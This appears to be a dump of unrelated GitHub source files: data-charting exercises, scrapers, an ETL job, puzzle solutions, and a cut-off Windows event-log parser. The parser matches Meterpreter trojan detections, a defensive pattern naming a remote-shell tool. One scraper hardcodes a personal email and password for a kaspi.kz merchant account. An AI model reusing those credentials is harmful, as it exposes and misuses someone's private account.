forward...' % plan_file)\n\n trigger_uri = create_assembly(client, args.app_name, plan_uri)\n create_webhook(_filter_trigger_url(trigger_uri))\n print('Successfully created Solum plan, assembly and webhooks!')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('app_name', help=\"app name\")\n parser.add_argument('--git-uri', required=True, dest='git_uri',\n help=\"git repo uri\")\n parser.add_argument('--test-cmd', required=True, dest='command',\n help=\"entrypoint to run tests\")\n parser.add_argument('--public', action='store_true', default=False,\n dest='public', help=\"public repo, defaults to False\")\n parser.add_argument('--user-key', action='store_true', default=False,\n dest='user_key', help=\"add SSH key to the user account\"\n \" rather than the repo,\"\n \" defaults to False\")\n\n args = parser.parse_args()\n main(args)\n","repo_name":"openstack/python-solumclient","sub_path":"contrib/setup-tools/solum-app-setup.py","file_name":"solum-app-setup.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"78"} +{"seq_id":"272469526","text":"'''\r\nAuthor: Ben Lehmann\r\nDate: 11/1 - 12/10\r\nFunction: Ask the user to either add item names, or prices or even both\r\n\r\nData Structures: Queues, Map, Stack\r\nAlgorithm: Insertion Sort\r\n\r\n10/28 - Standup #1\r\n11/04 - Standup #2\r\n11/10 - Standup #3\r\n11/17 - Standup #4\r\n\r\n\r\n\r\n'''\r\n\r\n\r\nclass GroceryList: #We create a Stack for the Grocery List, easy to add and remove\r\n def __init__(self):\r\n self.items = []\r\n\r\n def checkEmpty(self): #Check if the item is empty\r\n return self.items == []\r\n\r\n def push(self,item): #We insert the user's item\r\n self.items.insert(0,item)\r\n\r\n def adding(self,item):\r\n self.items.append(item)\r\n\r\n def remove(self): #We remove the user's item\r\n self.items.pop()\r\n\r\n def length(self): #I did not need this, this we to check if the stack is empty\r\n return len(self.items)\r\n\r\nclass Prices: #We create a Queue for Prices\r\n def __init__(self):\r\n self.queue = []\r\n\r\n def is_empty(self):\r\n return self.size() == 0 #Check is queue is empty\r\n\r\n def size(self): #Check the size to see if anything is in there\r\n return len(self.queue)\r\n\r\n def enqueue(self,cost): #With Queues, we enqueue and dequeue, so we user append and pop\r\n self.queue.append(cost)\r\n def dequeue(self):\r\n if len(self.queue) < 1: #If the queue is empty, we can't do anything, but if there is, we remove the front\r\n return None\r\n return self.queue.pop(0)\r\n\r\ndef UserItems(): #This method calls back the Stack Class\r\n grocery = GroceryList()\r\n i = 0\r\n while 1: #We are going to iterate through until the user is done inputing items\r\n i += 1\r\n items = input('Enter item %d: ' % i)\r\n if items == '':\r\n break\r\n grocery.adding(items) #We will use the adding() function from the GroceryList class\r\n print(grocery.items)\r\n addOr = input(\"Do you want to add another or delete? Enter 'Add' or 'Delete: \") #We will give the chance of adding or removing from the stack\r\n if(addOr == 'Add'):\r\n added = input('Enter the item')\r\n grocery.adding(added)\r\n return grocery.items\r\n elif(addOr == 'Delete'):\r\n grocery.remove()\r\n return grocery.items\r\n return \"Your List: \" + str(grocery.items)\r\n\r\ndef UserCost(): #We use the Queue list here\r\n cost = Prices()\r\n print(\"Enter your prices and then type '0.0' to finish\")\r\n i = 0\r\n while 1:\r\n i += 1\r\n items = float(input('Enter Price %d: ' % i)) #Most Grocery prices are floats, so I decided to keep these floats\r\n if items == 0.00: #If the user is done, they type in 0.00, which means I have nothing else\r\n break #We break from the loop\r\n cost.enqueue(items)\r\n return(cost.queue)\r\n\r\ndef userTotal(): #Disregard this Method\r\n cost = Prices()\r\n print(\"Enter your prices and then type '0.0' to finish\")\r\n i = 0\r\n while 1:\r\n i += 1\r\n items = float(input('Enter Price %d: ' % i))\r\n if items == 0.00:\r\n break\r\n cost.enqueue(items)\r\n return(cost.queue)\r\n\r\nclass UserAndCost: #I decided to create a map structure to keep user's items and prices\r\n def __init__(self):\r\n self.dic = {}\r\n\r\n def add(self,key,value): #This is how we add items to the map\r\n self[key] = value\r\n\r\n def print_value(self): #We are going to return the map results\r\n print(\"Items------------\")\r\n for k,v in self.dic.items():\r\n print(k + \" : \" + v)\r\n return\r\n\r\n def total(self): #This is totals, disregard\r\n totals = self.dic.values()\r\n print(str(sum(totals)))\r\n\r\ndef combine():\r\n cost_item = UserAndCost() #This is where we add the user's prices and items to the map, using a for loop\r\n user_x = int(input(\"Enter the Number of items: \"))\r\n for x in range(user_x):\r\n item = input('Enter your item: ')\r\n cost = input('Enter your price: ')\r\n cost_item.dic[item] = cost\r\n cost_item.print_value()\r\n\r\n\r\ndef InsertionSort(userList): #I was between Selection Sort or Insertion sort, tried both, tested them and Insertion was better\r\n for i in range(1, len(userList)): #If i in range (1 and the number of items in our list), the current value will be the current index\r\n currentVal = userList[i] #Current val is the current index of the list\r\n pos = i #Position of the list is index i\r\n while pos>0 and userList[pos-1]>currentVal: #If our position is not negative and the previous position of the list is still bigger than current\r\n userList[pos]=userList[pos-1] #We will set our current pos index of the list to the previous index\r\n pos=pos-1\r\n userList[pos] = currentVal\r\n\r\n\r\ndef UserSelection(): #This is the main control, this tells the user everything and what to type in\r\n user = input(\"Do You Want to Enter Prices or Enter Items, Press P for Prices or I for Item or B for Both: \")\r\n if user == 'i':\r\n items = UserItems()\r\n return items\r\n elif user == 'p':\r\n cost = UserCost()\r\n print(cost)\r\n InsertionSort(cost) #We will sort out price, numerically order\r\n print(cost)\r\n return \"Cost $\" + str(sum(cost))\r\n elif user == 'b':\r\n user_items = combine()\r\n print(user_items)\r\n else:\r\n return None\r\n\r\nif __name__ == \"__main__\":\r\n print(UserSelection())","repo_name":"BenLehmann5/FinalProject","sub_path":"FinalProject.py","file_name":"FinalProject.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70514545851","text":"################## import session ######################\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#########################################################\n\n################## common session #######################\nplt.rc('font', family='NanumGothic')\ncnt, PNG, UNDERBAR = 0, '.png', '_'\nCHART_NAME = 'brokenLineExam'\nfilename = '../data/주요발생국가주간동향(4월2째주).csv'\n########################################################\n\n############# 지정한 날짜에 대한 꺽은선 그래프 ################\ndata = pd.read_csv(filename, encoding='utf-8', index_col='국가')\nprint(data.columns)\nprint('-'*30)\n\nprint(data)\nprint('-'*30)\n\nchartdata = data['4월06일']\nprint(type(chartdata))\nprint(chartdata)\nprint('-'*30)\n\n# 꺽은선 그래프 그리기\nplt.plot(chartdata, color='blue', linestyle='solid', marker='.')\n\n# y축에서 보여줄 단위\nYTICKS_INTERVAL = 50000\n\n# chartdata내의 최대값보다 조금더 보여주기 위해서 최대값을 구한 것이다\nmaxlim = (int(chartdata.max()/YTICKS_INTERVAL) + 1) * YTICKS_INTERVAL\nprint(maxlim)\n\n# 0 부터 1100전까지 가는데 100씩 증가\nvalues = np.arange(0, maxlim + 1, YTICKS_INTERVAL)\nprint(values)\n\n# y축에 보이는 숫자를 3자리씩 끊어서 ',' 를 삽입해준다\nplt.yticks(values, ['%s' % format(val, ',') for val in values])\n\n# 그래프 배경에 격자 생성\nplt.grid(True)\n\n# 그래프 x 축 라벨\nplt.xlabel('국가명')\n\n# 그래프 y 축 라벨\nplt.ylabel('발생 건수')\n\n# 그래프 제목\nplt.title('4월 6일 코로나 발생 건수')\n\ncnt += 1\nsavefile = CHART_NAME + UNDERBAR + str(cnt).zfill(2) + PNG\nplt.savefig(savefile, dpi=400)\nprint(savefile + '파일 저장 완료 ')\n######################################################\n\n######### 날짜별 국가들의 코로나 확진 꺽은선 그래프 ###########\nCOUNTRY = ['스페인','프랑스','독일','중국','영국','이란']\nWHEN = ['4월06일','4월07일','4월08일','4월09일','4월10일']\n\nchartdata = data.loc[COUNTRY, WHEN]\n\n# 행과 열을 변경하기 위해서 전치를 사용한다\nchartdata = chartdata.T\n\nprint(chartdata)\nprint('-'*30)\n\nchartdata.plot(title='Some Title', marker='.', rot=0, legend=True, figsize=(10,6))\n\nplt.grid(True)\nplt.xlabel('일자')\nplt.ylabel('국가명')\nplt.title('일자별 국가 코로나 발생 건수')\n\ncnt += 1\nsavefile = CHART_NAME + UNDERBAR + str(cnt).zfill(2) + PNG\nplt.savefig(savefile, dpi=400)\nprint(savefile + '파일 저장 완료 ')\n#########################################################\n\n################## 식당 총금액과 팁 정보 #####################\ntipsfile = '../data/tips.csv'\nmyframe = pd.read_csv(tipsfile)\nprint(type(myframe))\nprint(myframe.columns)\n\n# [:(행), [(열)]]을 의미\ndata_bill = myframe.loc[:, ['total_bill']]\ndata_tip = myframe.loc[:, ['tip']]\n\nfig, ax1 = plt.subplots()\nax1.set_title('결제 금액과 tip(이중축)')\n\nxrange = range(len(myframe))\ncolor = 'tab:red'\nax1.set_ylabel('결제금액', color=color)\n# plot: 2차원을 의미\n# x축과 y축이 필요\n# x축은 myframe의 갯수가 표시, y축은 결제 금액에 대한 값을 표시\nax1.plot(xrange, data_bill, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n\n# twinx(): 기존에 사용하던 x축은 그대로 유지하면서 다른 y축에 새로운 값을 추가할 수 있다.(이중축)\nax2 = ax1.twinx()\ncolor = 'tab:blue'\nax2.set_ylabel('팁(tip)', color=color)\nax2.plot(xrange, data_tip, color=color)\nax2.tick_params(axis='y', labelcolor=color)\n\nfig.tight_layout()\n\ncnt += 1\nsavefile = CHART_NAME + UNDERBAR + str(cnt).zfill(2) + PNG\nplt.savefig(savefile, dpi=400)\nprint(savefile + '파일 저장 완료 ')\n########################################################\nprint('finished')","repo_name":"torvlf/python","sub_path":"example/brokenLineExam.py","file_name":"brokenLineExam.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40366120460","text":"class Solution:\n def singleNumber(self, nums: List[int]) -> List[int]:\n xor = first = second = 0\n for num in nums:\n xor ^= num\n one = xor & (-xor)\n for num in nums:\n if one & num:\n first ^= num\n else:\n second ^= num\n return [first, second]\n","repo_name":"StefanRankovic/leetcode","sub_path":"contest/2020/07/single_number_iii.py","file_name":"single_number_iii.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72752720893","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport requests\nimport json\nimport re\nimport os\n\n\ndef example_func():\n result = \"\"\n # output json\n # write file\n with open(\"states.json\", \"w\") as f:\n json.dump(\n result, f, indent=2\n ) # json.dump - write JSON file to local directory from Python object in Python file\n\n write_json_string = json.dumps(\n None, indent=2\n ) # json.dumps - write Python object to JSON string within Python file\n\n # read the output json to check the result\n # read file\n with open(\"states.json\") as f:\n data = json.load(\n f\n ) # json.load - read JSON file from local directory into Python Object in Python file\n read_json_result = json.loads(\n None\n ) # json.loads - read JSON string format file into Python Object within Python file\n\n # html_url = 'https://www.timesjobs.com/candidate/job-search.html?searchType=personalizedSearch&from=submit&txtKeywords=Python&txtLocation='\n # html_text = requests.get(html_url).text\n # soup = BeautifulSoup(html_text, 'lxml')\n # job = soup.find('li', class_='clearfix job-bx wht-shd-bx')\n # print(job)\n\n # read target webpage\n with open(\"home.html\", \"r\") as html_file:\n content = html_file.read()\n\n # Create BeautifulSoup object\n soup = BeautifulSoup(content, \"lxml\")\n\n # get the first target tag\n first_tag = soup.find(\"div\")\n # print(f'first_tag {first_tag}')\n\n # get all target tags\n all_tags = soup.find_all(\"div\", class_=\"top1\")\n print(f\"all tags {all_tags}\")\n\n for tag in all_tags:\n print(tag.find(\"div\", class_=\"div2\").text)\n\n\ndef scrape_page():\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n option_cards = cards[\"option_cards\"]\n\n for option in option_cards:\n img_url = option[\"img_src\"]\n img_data = requests.get(img_url).content\n # filename follows cards' number\n number = option[\"number\"]\n fileName = \"./images/options/\" + number + \".png\"\n # make new directory\n dirname = os.path.dirname(fileName)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n # save file to local directory\n with open(fileName, \"wb\") as f:\n f.write(img_data)\n\n # cards[\"monster_cards\"] = monster_cards\n\n # write effect cards Python list dict to JSON file\n\n # url = (\n # \"https://digimon.neoseeker.com/wiki/Option_cards_in_Digimon_Digital_Card_Battle\"\n # )\n # req = Request(\n # url,\n # headers={\n # \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36\"\n # },\n # )\n # webpage = urlopen(req).open()\n # soup = BeautifulSoup(webpage, \"lxml\")\n # print(soup)\n\n # get the html string\n # page_url = (\n # \"https://digimon.neoseeker.com/wiki/Option_cards_in_Digimon_Digital_Card_Battle\"\n # )\n # html_string = requests.get(page_url).text\n # soup = BeautifulSoup(html_string, \"lxml\")\n # print(soup)\n\n # read cards json file\n # cards = None\n # with open(\"cards.json\") as f:\n # cards = json.load(f)\n # effect_cards = cards[\"effect_cards\"]\n\n # get all image source links\n # image_tags = soup.find_all(\"img\")\n # print(f\"image tags count:{len(image_tags)}\")\n # img = image_tags[0]\n # print(img[\"src\"])\n\n # # # loop through all img_urls\n # for i, img in enumerate(image_div):\n # img = image_div.find('img')\n # print(img['src'])\n # # effect_cards[i][\"img_src\"] = img[\"src\"]\n # # # write effect cards Python list dict to JSON file\n # with open(\"effectCards.json\", \"w\") as f:\n # json.dump(effect_cards, f, indent=2)\n\n\ndef addMonsterImageUrls():\n # get the html string\n page_url = \"https://digimon.fandom.com/wiki/Digimon_Digital_Card_Battle/Cards\"\n html_string = requests.get(page_url).text\n soup = BeautifulSoup(html_string, \"lxml\")\n\n # read cards json file\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n monster_cards = cards[\"monster_cards\"]\n effect_cards = cards[\"effect_cards\"]\n\n # get all image source links\n image_urls = soup.find_all(\"img\", class_=\"pi-image-thumbnail\")\n # # loop through all numbers\n numbers = soup.find_all(\"b\")\n for i, img in enumerate(image_urls):\n monster_cards[i][\"img_src\"] = img[\"src\"]\n # # write monster cards Python list dict to JSON file\n with open(\"monsterCards.json\", \"w\") as f:\n json.dump(monster_cards, f, indent=2)\n\n\ndef updateMonsterCardJson():\n # read cards json file\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n with open(\"monsterCards.json\") as f:\n monster_cards = json.load(f)\n\n cards[\"monster_cards\"] = monster_cards\n # write cards master JSON file\n with open(\"cards.json\", \"w\") as f:\n json.dump(cards, f, indent=2)\n # # write monster cards Python list dict to JSON file\n with open(\"monsterCards.json\", \"w\") as f:\n json.dump(monster_cards, f, indent=2)\n # # write effect cards Python list dict to JSON file\n # with open(\"effectCards.json\", \"w\") as f:\n # json.dump(effect_cards, f, indent=2)\n\n\ndef getUniqueEffects():\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n monster_cards = cards[\"monster_cards\"]\n effect_cards = cards[\"effect_cards\"]\n\n effect_master = []\n\n for card in monster_cards:\n if card[\"x_effect\"] != \"None\":\n effects = card[\"x_effect\"].split(\". \")\n for effect in effects:\n effect_master.append(effect.rstrip(\".\").lower())\n if card[\"support\"] != \"None\":\n effects = card[\"support\"].split(\". \")\n for effect in effects:\n effect_master.append(effect.rstrip(\".\").lower())\n for card in effect_cards:\n if card[\"effect\"] != \"None\":\n effects = card[\"effect\"].split(\". \")\n for effect in effects:\n effect_master.append(effect.rstrip(\".\").lower())\n temp = set(effect_master)\n effect_master = list(temp)\n effect_master.sort()\n temp2 = \"\"\n for effect in effect_master:\n temp2 = temp2 + effect + \"\\n\"\n\n with open(\"effectList4.txt\", \"w\") as f:\n f.write(temp2)\n\n\ndef addEffectImageUrls():\n with open(\"effect_cards_neoseeker.txt\") as f:\n effects_cards_string = json.load(f)\n base_img_url = \"https://cdn.staticneo.com/w/digimon/\"\n\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n effect_cards = cards[\"effect_cards\"]\n # parse the wiki strings to list\n img_url_list = re.findall(r\"image=\\S+\\n\", effects_cards_string)\n for i, img_url in enumerate(img_url_list):\n url = img_url[len(\"image=\") :].capitalize()\n url = base_img_url + url\n effect_cards[i][\"img_src\"] = url\n\n cards[\"effect_cards\"] = effect_cards\n\n # write effect cards Python list dict to JSON file\n with open(\"effectCards.json\", \"w\") as f:\n json.dump(effect_cards, f, indent=2)\n with open(\"cards.json\", \"w\") as f:\n json.dump(cards, f, indent=2)\n\n\nif __name__ == \"__main__\":\n scrape_page()\n","repo_name":"AsyrafKZ/digital-card-battle-clone-data-collection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73074794172","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import make_pipeline\n\ndef nb_rand (nb):\n\tx=np.random.uniform(-3,10,nb)\n\tx=np.sort(x)\n\treturn x\n\ndef f (x): \n\ty = 10 * np.sin(x)/x + np.random.normal(0,1,15)\n\t#bruit = np.random.normal(0,1,15)\n\n\treturn (y)\n\t\ndef polyReg(deg):\n\treturn make_pipeline(PolynomialFeatures(deg),Ridge())\n\t\n\n\nnp.random.seed(1337)\nx = nb_rand(15)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\n\ny = f(x)\nx =x.reshape(-1,1)\n\n\nprint(y)\nplt.plot(x,y, color='black', marker='o',linestyle='none',markersize=2)\nplt.xlabel('x')\n\nplt.ylabel('f(x) = 10 * sin(x)/x + gaussian')\nplt.axis([-4, 12, -5, 15])\nplt.grid(True)\n\n\nmodel = polyReg(1)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"green\")\n\nmodel = polyReg(3)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"red\")\n\nmodel = polyReg(6)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"blue\")\n\nmodel = polyReg(9)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"yellow\")\n\nmodel = polyReg(12)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"brown\")\n\n\t\t\t\t\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xOrzer/Cheh","sub_path":"AA/tp11.py","file_name":"tp11.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17541373686","text":"\ndef leapyear(y):\n\t'''\n\t>>> leapyear(1999)\n\tFalse\n\t>>> leapyear(1968)\n\tTrue\n\t>>> leapyear(2000)\n\tTrue\n\t>>> leapyear(1800)\n\tFalse\n\t'''\n\n\t#if y % 4 == 0:\n\t\t\n\t#\tif y % 100 == 0:\n\t#\t\tif y % 400 == 0:\n\t#\t\t\treturn True # Divisor entre 4, 100 y 400\n\t#\t\telse:\n\t#\t\t\treturn False # Divisor entre 4 y 100 pero no 400\n\t#\telse:\n\t#\t\treturn True # Divisor entre 4 pero no entre 100\n\t#\n\t#else:\n\t#\treturn False\n\t\t\n\t\t\n\t\n\treturn (y%4 == 0 ) and (y%100 != 0 or y%400==0)\t\n\n# This will run the function on the test examples\nif __name__ == \"__main__\":\n\timport doctest\n\tdoctest.testmod(verbose=True)\n","repo_name":"ilialecha/Programming_1","sub_path":"Lists/List_1/leaf_year.py","file_name":"leaf_year.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37498142126","text":"##Problem 120\r\n##\r\n##Let r be the remainder when (a−1)**n + (a+1)**n is divided by a**2.\r\n##\r\n##For example, if a = 7 and n = 3, then r = 42: 63 + 83 = 728 ≡ 42 mod 49.\r\n##And as n varies, so too will r, but for a = 7 it turns out that rmax = 42.\r\n##\r\n##For 3 ≤ a ≤ 1000, find ∑ rmax.\r\n\"\"\"\r\n(a-1)**n + (a+1)**n = 2*sum(a**(n-i)*C_n_i) pour i dans[0,n], pair\r\n\"\"\"\r\n\r\nsom = 0\r\nfor a in range(3, 1001):\r\n if a%2 == 0:\r\n som += a*(a-2)\r\n else:\r\n som += a*(a-1)\r\n\r\nprint(som)\r\n\r\n\r\n\r\n","repo_name":"lenaindelaforetmagique/ProjectEuler","sub_path":"Python/PE120.py","file_name":"PE120.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10078501237","text":"import os\n\nwith open(\"main.c\", \"w\") as s:\n with open(\"template.c\") as f:\n for line in f:\n if line == '// INSTALLATION_SERIAL\\n':\n serial = os.popen(\"ioreg -l | awk '/IOPlatformSerialNumber/ { print $4;}' | awk -F'\\\"' '{ print $2; }'\").read().split(\"\\n\")[0]\n s.write('#define INSTALLATION_SERIAL \"{}\"\\n'.format(serial))\n else:\n s.write(line)\n \nprint(os.popen(\"gcc -c main.c -o main.o && gcc -L. -lapp_lib main.o -o app && rm main.c main.o && echo 'installation succeded!\\n' && ./app\").read())\n","repo_name":"katya-varlamova/7-sem-information-security","sub_path":"lab_01/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31847834719","text":"import requests\nimport json\nfrom config import date_time\n\n\nasync def make_request():\n s = requests.Session()\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n }\n data = {\n \"action\": \"login\",\n \"username\": \"alevtinanur89@gmail.com\",\n \"password\": \"Dmitrii19891989!\"\n }\n login_url = 'https://kaspi.kz/mc/api/login'\n\n s.post(\n url=login_url,\n headers=headers,\n data=data\n )\n return s\n\n\nasync def try_api():\n \"\"\"\n https://kaspi.kz/merchantcabinet/api/order/details/%7Bstatus%7D/210056362\n https://kaspi.kz/merchantcabinet/api/order/search\n {\"searchTerm\":{\"statuses\":[\"ACCEPTED_BY_MERCHANT\",\"SUSPENDED\"],\"term\":null,\"orderTab\":\"DELIVERY\",\"superExpress\":false,\"returnedToWarehouse\":false,\"cityId\":null,\"fromDate\":1658685600000,\"toDate\":1658826819741},\"start\":0,\"count\":10}\n \"\"\"\n s = await make_request()\n headers2 = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n 'Content-Type': 'application/json',\n }\n\n fromdate = await date_time.start()\n todate = await date_time.time()\n delivery_url = 'https://kaspi.kz/mc/api/orderTabs/active?count=50&selectedTabs=DELIVERY&startIndex=0&returnedToWarehouse=false'\n pickup_url = 'https://kaspi.kz/mc/api/orderTabs/active?count=50&selectedTabs=PICKUP&startIndex=0&returnedToWarehouse=false'\n archive_url = f'https://kaspi.kz/mc/api/orderTabs/archive?start=0&count=50&fromDate={fromdate}&toDate={todate}&statuses=CANCELLED&statuses=COMPLETED&statuses=RETURNED&statuses=RETURN_REQUESTED&statuses=CREDIT_TERMINATION_PROCESS'\n\n request = s.get(\n delivery_url,\n headers=headers2,\n cookies=s.cookies.get_dict()\n )\n\n request2 = s.get(\n archive_url,\n headers=headers2,\n cookies=s.cookies.get_dict()\n )\n\n request3 = s.get(\n pickup_url,\n headers=headers2,\n cookies=s.cookies.get_dict()\n )\n # with open(f'{prod[\"orderCode\"]}_prod_detail.json', 'w', encoding='utf-8') as my_json:\n # json.dump(detail_data.json(), my_json, ensure_ascii=False, indent=4)\n with open('my_product_1.json', 'w', encoding='utf-8') as my_json:\n json.dump(request.json(), my_json, ensure_ascii=False, indent=4)\n\n with open('my_product_2.json', 'w', encoding='utf-8') as my_json:\n json.dump(request2.json(), my_json, ensure_ascii=False, indent=4)\n\n with open('my_product_3.json', 'w', encoding='utf-8') as my_json:\n json.dump(request3.json(), my_json, ensure_ascii=False, indent=4)","repo_name":"TumantaevBaiaman/send_message_to_whatsapp","sub_path":"page_file/fille_get.py","file_name":"fille_get.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29321701378","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom io import StringIO, BytesIO\nfrom datetime import datetime, timedelta\nfrom sklearn.linear_model import LinearRegression\n\n\nclass ETL():\n def __init__(self, bucket_name, target_bucket_name, date):\n self.__s3 = boto3.resource('s3')\n self.__bucket = self.__s3.Bucket(bucket_name)\n self.bucket_target = self.__s3.Bucket(target_bucket_name)\n self.date = datetime.strptime(date, '%Y-%m-%d').date() - timedelta(days=1)\n \n \n def extract(self):\n pass\n \n def transform(self, df_all):\n pass\n \n def load(self, df_all):\n pass\n \n def read_csv_to_df(self, objects):\n csv_obj_init = self.__bucket.Object(key=objects[0].key).get().get('Body').read().decode('utf-8')\n data = StringIO(csv_obj_init)\n df_init = pd.read_csv(data, delimiter=',')\n df_all = pd.DataFrame(columns=df_init.columns)\n \n for obj in objects:\n csv_obj = self.__bucket.Object(key=obj.key).get().get('Body').read().decode('utf-8')\n data = StringIO(csv_obj)\n df = pd.read_csv(data, delimiter=',')\n df_all = pd.concat([df, df_all], ignore_index=True)\n \n return df_all\n \n def write_df_to_s3(self, df_all, key):\n out_buffer = BytesIO()\n df_all.to_parquet(out_buffer, index=False)\n self.bucket_target.put_object(Body=out_buffer.getvalue(), Key=key)\n \n def return_objects(self):\n objects = [obj for obj in self.__bucket.objects.all() if datetime.strptime(obj.key.split(\"/\")[0], '%Y-%m-%d').date() >= self.date]\n return objects\n \n\nclass XetraReporte(ETL):\n def __init__(self, bucket_name, target_bucket_name, date):\n super().__init__(bucket_name, target_bucket_name, date)\n \n def extract(self):\n objects = self.return_objects()\n df_all = self.read_csv_to_df(objects)\n return df_all\n \n def transform(self, df_all):\n df_all.dropna(inplace=True)\n df_all['start_price'] = df_all.sort_values(by=['Time']).groupby(['ISIN', 'Date'])['StartPrice'].transform('first')\n df_all['end_price'] = df_all.sort_values(by=['Time']).groupby(['ISIN', 'Date'])['EndPrice'].transform('last')\n df_all = df_all.query('\"08:00\" < Time < \"12:00\"').groupby(['ISIN', 'Date'], as_index=False).agg(start_price=('start_price', 'min'), end_price=('end_price', 'min'), minimum_price=('MinPrice', 'min'), maximum_price=('MaxPrice', 'max'), daily_traded_volume=('TradedVolume', 'sum'))\n df_all[\"end_price_mx\"] = df_all[\"end_price\"] * 19.08\n deviation = ['start_price','end_price']\n df_all[\"standard_deviation\"] = df_all[deviation].std(axis=1)\n return df_all\n \n\n def load(self, df_all):\n key = 'xetra_daily_report_' + datetime.today().strftime(\"%Y%m%d_%H%M%S\") + '.parquet'\n self.write_df_to_s3(df_all, key)\n\n def etl_report(self, key):\n prq_obj = self.bucket_target.Object(key=key).get().get('Body').read()\n data = BytesIO(prq_obj)\n df_report = pd.read_parquet(data)\n return df_report\n\n def run(self):\n df_all = self.extract()\n df_transformed = self.transform(df_all)\n model = self.linear_regression(df_transformed)\n print(model)\n print('DATAFRAME TRANSFORMADO:')\n print(df_transformed)\n self.load(df_transformed)\n\n\n def linear_regression(self, df_all):\n # Selecciona la columna 'end_price' donde la fecha se encuentre entre 'arg_date' y 'arg_date + 1 día'\n y = df_all.query(f'Date == \"{self.date}\"')['end_price']\n \n # Crea una matriz X con los valores de la columna 'start_price'\n x = np.array(df_all.query(f'Date == \"{self.date}\"')['start_price']).reshape(-1, 1)\n \n # Crea una instancia de la clase LinearRegression\n model = LinearRegression()\n \n # Entrena el modelo con los datos\n model.fit(x, y)\n \n print('COEFICIENTES:')\n print(model.coef_)\n print('INTERCEPTO DE MODELO:')\n print(model.intercept_)\n \n return model\n \n\n# Crear una instancia de la clase\nreport = XetraReporte(bucket_name='xetra-1234', target_bucket_name='xetra-ajlj', date='2022-12-31')\n\n# Ejecutar el proceso ETL\nreport.run()\n\n# Obtener el reporte\nkey = 'xetra_daily_report_20230328_000509.parquet'\ndf_report = report.etl_report(key)\n","repo_name":"AlanJLJ2202/xetra-project","sub_path":"2do_Parcial/Proyecto_2P.py","file_name":"Proyecto_2P.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19885660197","text":"import os\nimport csv\nimport pickle\n\nevent_ids=[\"1116\"]\nevent_des=[\"Trojan:Win64/Meterpreter\",\"Trojan:Win32/Meterpreter\"]\n\n# Module input: event_list from windows-event-log-parser.py\n\ndef main(event_list):\n for f in event_list:\n found=[]\n n=0\n for row in event_list[f]:\n n+=1\n if any(row[0]==id 